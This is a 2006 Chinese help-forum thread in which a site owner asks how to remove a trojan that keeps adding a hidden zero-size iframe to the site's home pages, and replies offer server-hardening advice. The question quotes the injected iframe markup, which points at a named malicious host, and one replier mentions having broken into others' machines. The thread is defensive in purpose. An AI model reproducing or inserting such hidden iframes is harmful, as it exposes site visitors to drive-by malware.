请问,网站中了icyfox木马,怎么清除呀?
就是我们的网站的首页index.htm和论坛首页index.asp,两个页面最下老多出这样的代码</html> <iframe src="http://www.dgsu.com/bbs/icyfox.htm" name="zhu" width="0" height="0" frameborder="0"> </html> 这个代码指向的网站是有病毒的!
就是最下面多出了这样的代码</html> <iframe src="http://www.dgsu.com/bbs/icyfox.htm" name="zhu" width="0" height="0" frameborder="0"> </html> 我删掉了,过了一段时间又被加上了。不知道怎么回事?
有时候指向的网站地址还会换.
请问怎么清除呀?
问题点数:20、回复次数:4Top
1 楼jycjyc(果果)回复于 2006-03-07 09:39:00 得分 0
可能你的网站服务器有上传方面的漏洞。Top
2 楼kafly(王者)回复于 2006-03-07 10:50:01 得分 20
被人利用漏洞上传了asp后门
我以前就处理过一台被黑的服务器,也入侵过别人的主机。给你点提议:
一、系统和应用程序
telnet和pcanywhere 绝对不要装!pcanywhere的密码表可以被破解直接得到管理员密码。
防火墙倒不用装,直接设置INTERNET连接的防火墙就可以了,照你的情况,到例外里填上21,80,1433,3389。别的统统禁止掉。
C盘只装系统,D盘只放WEB,E盘装SQL,F放软件。除了必须的应用程序,任何东西都不装。
检查系统用户,管理工具里的计算机管理。系统自动建立的几个ID,除GUEST可以保留,全都删掉。特别是前面有$的,检查administrators组,只有你自己的管理员帐号,最好改个名,大小写字母加数字中间再加点符号,密码一定要修改!同样要复杂,长度建议12位以上,不要怕麻烦!
C,D,E一定要用NTFS格式,设置好权限,给不同的网站建好不同的匿名访问帐号,并设置到相应目录权限上。
FTP的问题:Serv-U绝对不能用低于6.0的版本。有漏洞,可以直接建管理员帐号。
其次还可以参照网上的一些教程写好策略
二、自己的程序,请人帮你把程序检查检查,第一步可以用卡巴斯基服务器版查杀一便。
第二步是手工检查所有ASP程序,绝对保证没有后门。
第三步是到所有数据库连接上加上注入判断,一般在CONN文件头部写上就可以了。
还有就是在IIS里设置不显示错误信息。站点属性 -> 主目录 -> 配置 -> 调试 -> 脚本错误的错误信息 改成 向客户端发送下面错误信息。
到这里就基本安全了。不给分我打你PPTop
3 楼Allentro(悠哉游哉)回复于 2006-03-07 11:22:37 得分 0
楼上的够详尽!
另外,如果已经中招,一定要好好查一下是否有上传漏洞、后门之类。如果找了很久都没有找到,考虑一下网站上被植入了“一句话木马”的可能性。Top
4 楼ccgsab(不懂程序)回复于 2006-03-10 09:13:32 得分 0
谢谢!Top
